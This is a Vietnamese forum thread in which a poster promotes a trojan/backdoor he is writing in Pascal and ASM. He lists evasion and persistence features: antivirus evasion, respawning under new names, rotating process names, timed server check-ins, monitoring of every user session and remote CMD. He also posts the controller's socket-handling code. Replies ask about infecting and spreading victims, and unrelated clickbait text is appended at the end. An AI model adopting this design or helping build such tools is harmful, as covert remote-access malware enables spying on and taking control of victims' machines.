-
19-11-2013, 07:50 PM #1Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Lập trình virus trojan backdoor nâng cao.
Mạo muội lập topic này để anh em giao lưu chia sẻ kinh nghiệm về lập trình trojan [IMG]images/smilies/lick.gif[/IMG]
Mình xin phép giới thiệu về tính năng của con trojan mình đang xây dựng [IMG]images/smilies/2.gif[/IMG]
Ưu điểm:
-> dễ dàng cập nhật version.
-> chạy thông minh (khi nào cần sử dụng virus tự chạy ... không cần thì thôi không chạy ... khó tìm[IMG]images/smilies/wink.png[/IMG])
-> nếu virus bị phát hiện ... victim sẽ tự nhiên mọc lại con mới ở ngay chỗ mới với 1 tên gọi mới [IMG]images/smilies/lick.gif[/IMG]
-> anti virus 100% tất cả không phát hiện ra.
-> không sử dụng lib hay dll gì riêng của win vì vốn tự có nên dung lượng hơi cao. (đã test chạy ok từ win xp đến 2012 r2).
-> có thể chỉnh chế độ safe timer run , giả sử làm việc lúc 12h đêm đến 3h sáng thì trong khoảng thời gian đã định virus sẽ chạy và request về server , nếu ko đúng giờ thì nằm yên [IMG]images/smilies/biggrin.png[/IMG]
-> Trong thời gian hoạt động, virus sẽ tự động tắt nghỉ 15 phút / lần để thay đổi process name liên tục để tránh bị truy quét. thường sẽ count process nào chạy *.exe nhiều nhất thì sẽ chạy theo tên đó, lập 1 danh sách cụ thể xếp theo thứ tự vào hoán đổi vị trí theo các chu kỳ. (rõ khổ cho các bác chạy anti vir = tay ^_^!)
-> Tính năng ưa thích nhất: Virus chạy multi sessions. Giả sử không có user nào logon thì virus khi hoạt động sẽ chạy quyền cao nhất của windows, giả sử có 3 user admin, administrator, guest đang làm việc trên 1 máy, virus sẽ tự chạy cả 3 sessions thêm cái session thứ 4 cao nhất của windows -> tổng là 4. Vì vậy có thể nhìn màn hình trên mỗi user đang làm việc phân chia ra cụ thể.
Khuyết điểm:
-> size khá lớn thường là 3,5 mb.
-> do code ẩu nên còn bug vài chỗ, khổ là phải đang ngồi fix và xem lại từng dòng [IMG]images/smilies/lick.gif[/IMG]
-> tính năng chưa hoàn thiện mấy, nhưng về nhìn chung thì mình chỉ cần remote CMD thôi [IMG]images/smilies/17.gif[/IMG]
Ngôn ngữ lập trình:
-> Pascal
-> ASM
Vài hình ảnh interface cho các bạn tham khảo:
<font color="Red">Bài 1: Kết nối:
Server:
Mã:procedure FormCreate(Sender: TObject); procedure Timer1Timer(Sender: TObject); procedure ServerSocket1ClientDisconnect(Sender: TObject; Socket: TCustomWinSocket); procedure ServerSocket1ClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure Starthostserver1Click(Sender: TObject); procedure Stophostserver1Click(Sender: TObject); procedure ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket); procedure TForm1.FormCreate(Sender: TObject); var ResStream: TResourceStream; begin DeleteFile('DiaChi_IP.database'); if not FileExists('DiaChi_IP.database') then begin ResStream := TResourceStream.Create(hInstance, 'DiaChi_IP', RT_RCDATA); try ResStream.Position := 0; ResStream.SaveToFile('DiaChi_IP.database'); finally ResStream.Free; end; end; StatusBar1.Panels[0].Text := StatusBar1.Panels[0].Text + GetBuildInfoAsString; KetNoi_GS := 0; KetNoi_KT := 0; Spxp1.Click; end; procedure TForm1.FormShow(Sender: TObject); var i : Integer; begin for i := 0 to ParamCount do begin if ParamStr(i) = '/@/Khoi_dong_tat_ca/@/' then begin Starthostserver1.Click; Khingmychktni1.Click; end; end; end; procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket); begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS)); end;
View more random threads:
- Có thể decode virus(.exe) bằng tool nào?
- file autorun.inf trên usb không thể xóa trừ khi format cả ổ?
- Hook winsock, bắt Link khi duyệt web như thế nào?
- học phần mềm có làm được trình duyệt viruts không?
- Cách tạo file exe từ một ứng dụng
- Đây có phải là trojan không ạ
- Ẩn process trong process list bằng C++ Win32
- Khẩn cấp diệt con bot trên máy các bạn !
- Cách chống kill thread cho phần mềm anticheat có cơ chế hoạt động giống một chương trình antivirus?
- Code virut viết bằng C, tác dụng của nó như thế nào?
-
23-05-2014, 03:51 PM #2Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Bác cho em hỏi 1 chút là pascal thì giao tiếp với api window kiểu gì vậy, hồi lớp 10 học mỗi turbo pascal, toàn dos.
Thank bác
-
16-10-2014, 05:42 PM #3Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Thế còn lây nhiễm và phát tán thì sao ạ? [IMG]images/smilies/clap_grin.gif[/IMG]
-
17-10-2014, 08:25 AM #4Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Rãnh giả mang luôn, sao mình thấy đối tượng theo giỏi toàn window server không vậy ? Íts khi nao thay user sài windows server lắm ... chắc cái naa`y server của bạn phải kô ?
-
30-05-2016, 11:06 AM #5Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
con này gờ còn xài được không anh?
-
01-06-2016, 01:11 PM #6Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Pascal
Mã:procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket);begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS));end;
Thông qua phân tích dữ liệu Google từ 86 quốc gia, mới đây, một công ty tại Anh đã công bố bảng xếp hạng kích tấc "cậu nhỏ" của các nước trên thế giới. Kết quả, hầu hết các nước xếp ở nhóm đầu của...
"Chim" của chàng trai Việt thuộc...